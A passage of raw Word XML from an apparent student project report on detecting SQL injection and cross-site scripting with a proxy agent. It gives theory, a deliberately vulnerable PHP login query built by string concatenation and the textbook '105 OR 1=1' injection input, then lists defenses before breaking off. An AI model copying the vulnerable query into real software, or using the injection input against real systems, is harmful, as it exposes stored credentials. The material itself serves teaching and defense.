      <w:tr w:rsidR="00D31DA4" w14:paraId="64FCF913" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="324"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3782" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="45A2C94D" w14:textId="0B60EFD3" w:rsidR="00D31DA4" w:rsidRDefault="00D31DA4" w:rsidP="00D31DA4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="10" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00E238C1">
              <w:t xml:space="preserve">Chaitanya Kulkarni </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="695" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="11116FDC" w14:textId="6227CF27" w:rsidR="00D31DA4" w:rsidRDefault="00D31DA4" w:rsidP="00D31DA4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="1" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E238C1">
              <w:t>41043</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D31DA4" w14:paraId="01C5A533" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="264"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3782" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="57EC49E8" w14:textId="2226980D" w:rsidR="00D31DA4" w:rsidRDefault="00D31DA4" w:rsidP="00D31DA4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00E238C1">
              <w:t>Manas Sonawane</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="695" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1EDC3ABA" w14:textId="6351E581" w:rsidR="00D31DA4" w:rsidRDefault="00766A10" w:rsidP="00D31DA4">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="1" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>41072</w:t>
            </w:r>
            <w:r w:rsidR="00D31DA4" w:rsidRPr="00E238C1">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="615DD314" w14:textId="03454DFE" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC" w:rsidP="00D31DA4">
      <w:pPr>
        <w:spacing w:after="47" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CDC61E" w14:textId="77777777" w:rsidR="00D31DA4" w:rsidRDefault="00D31DA4" w:rsidP="00D31DA4">
      <w:pPr>
        <w:spacing w:after="47" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2823950D" w14:textId="0D7FB138" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC" w:rsidP="00D31DA4">
      <w:pPr>
        <w:spacing w:after="3" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="535" w:right="987"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000008"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>This is in partial fulfillment of the award of the degree Bachelor of Computer Engineering of Savitribai Phule Pune University.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BE68B6" w14:textId="01C4173D" w:rsidR="00D31DA4" w:rsidRDefault="00D31DA4" w:rsidP="00D31DA4">
      <w:pPr>
        <w:spacing w:after="3" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="535" w:right="987"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ABC4238" w14:textId="77777777" w:rsidR="00D31DA4" w:rsidRDefault="00D31DA4" w:rsidP="00D31DA4">
      <w:pPr>
        <w:spacing w:after="3" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="535" w:right="987"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="156822BD" w14:textId="7B594AF5" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC" w:rsidP="00D31DA4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="825"/>
          <w:tab w:val="center" w:pos="3082"/>
        </w:tabs>
        <w:spacing w:after="724" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000008"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Date:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5709642E" w14:textId="5D12F61B" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="1392"/>
          <w:tab w:val="center" w:pos="4694"/>
          <w:tab w:val="center" w:pos="8517"/>
        </w:tabs>
        <w:spacing w:after="141" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000008"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">(Mrs. </w:t>
      </w:r>
      <w:r w:rsidR="00F40795" w:rsidRPr="00F40795">
        <w:rPr>
          <w:color w:val="000008"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Prajakta Puranik</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000008"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000008"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>(Prof. Dr. Mrs. S. A. Itkar)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000008"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>External Examiner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38774E33" w14:textId="78AF1D51" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC" w:rsidP="00D31DA4">
      <w:pPr>
        <w:spacing w:after="295" w:line="216" w:lineRule="auto"/>
        <w:ind w:left="835" w:right="2257" w:firstLine="2609"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000008"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Head Department of Computer Engineering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000008"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Internal Guide  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FFC66E" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="233" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="31"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PROBLEM STATEMENT:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166C43E1" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="33" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="290" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5274C104" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="29"/>
        <w:ind w:left="223" w:firstLine="53"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL Injection attacks and Cross -Site Scripting attacks are the two most common attacks on web application. Develop a new policy-based Proxy Agent, which classifies the request as a scripted request or query-based request, and then, detects the respective type of attack, if any in the request.  It should detect both SQL injection attack as well as the Cross-Site Scripting attacks. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641D8BB8" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="276" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8606CE" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="67" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBFFB6F" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="233" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="31"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>SOFTWARE AND HARDWARE:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1D88B3" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="33" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6411F76B" w14:textId="3A621AB4" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="13"/>
        <w:ind w:left="233" w:right="522"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTML, JS, </w:t>
      </w:r>
      <w:r w:rsidR="00D31DA4">
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, SQL, 8GB RAM, 1 TB HDD. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204DAD26" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="58" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF84625" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A7F43F" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="233" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="31"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>THEORY:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475209ED" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="38" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="235" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31539873" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="6" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="230" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>SQL INJECTION:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0C34F6" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="235" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4258C29E" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="62" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622F0DF9" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="30" w:line="406" w:lineRule="auto"/>
        <w:ind w:right="522" w:hanging="350"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL injection is a code injection technique that might destroy your database.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4237FCD9" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="236"/>
        <w:ind w:right="522" w:hanging="350"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL injection is one of the most common web hacking techniques. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EBE02E" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="522" w:hanging="350"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL injection is the placement of malicious code in SQL statements, via web page input. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C042C44" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="41"/>
        <w:ind w:right="522" w:hanging="350"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL injection usually occurs when you ask a user for input, like their username/userid, and instead   of a name/id, the user gives you an SQL statement that you will unknowingly run on your database. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1722E161" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302D1451" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="182"/>
        <w:ind w:left="233" w:right="522"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C71253E" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="186"/>
        <w:ind w:left="233" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$query = "select * from doctor where email_id='$email_id_doc' and password='$password_doc'"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAE8FBF" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:ind w:left="233" w:right="522"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$result = mysqli_query($conn, $query); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CD4C28" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="103"/>
        <w:ind w:left="233" w:right="522"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL Injection Based on 1=1 is Always True </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EF7617" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:ind w:left="233" w:right="522"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Look at the example above again. The original purpose of the code was to create an SQL statement to select a user, with a given user id. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15924F36" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:ind w:left="233" w:right="522"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If there is nothing to prevent a user from entering "wrong" input, the user can enter some "smart" input like this: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F59207" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="13"/>
        <w:ind w:left="233" w:right="522"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UserId: 105 OR 1=1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEFCDFD" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="20" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBE4CA2" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688EC814" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="77"/>
        <w:ind w:left="233" w:right="522"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then SQL will Look like this : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489E9051" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="134"/>
        <w:ind w:left="233" w:right="522"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SELECT * FROM Users WHERE Userid = 105 OR I=1; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0613403B" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:ind w:left="233" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The SQL above is valid and will return ALL rows from the "Users" table, since OR 1=1 is always TRUE. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B93D1E1" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="2" w:line="404" w:lineRule="auto"/>
        <w:ind w:left="233" w:right="522"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Does the example above look dangerous? What if the "Users" table contains names and passwords? The SQL statement above is much the same as this: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E7724A" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:ind w:left="233" w:right="522"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SELECT UserId, Name, Password FROM Users WHERE UserId = 105 or 1=1; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A185AA6" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="73"/>
        <w:ind w:left="233" w:right="522"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A hacker might get access to all the user names and passwords in a database, by simply inserting 105 OR 1=1 into the input field. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035A5D03" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="235" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAEF33D" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="233" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="31"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>AVOIDING SQL INJECTION:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB63903" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB5F75D" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="45" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DF8B5F" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="155" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="230" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>Primary Defenses:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F27429" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35"/>
        <w:ind w:right="522" w:hanging="262"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Option 1: Use of Prepared Statements (with Parameterized Queries) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045F08AA" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="33"/>
        <w:ind w:right="522" w:hanging="262"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Option 2: Use of Stored Procedures </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDC04F9" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="47"/>
        <w:ind w:right="522" w:hanging="262"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Option 3: Allow-list Input Validation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB7AC89" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:right="522" w:hanging="262"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Option 4: Escaping All User </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3462C2B6" w14:textId="77777777" w:rsidR="00842E6C" w:rsidRDefault="000E5BEC">
      <w:pPr>
        <w:spacing w:after="190" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="230" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
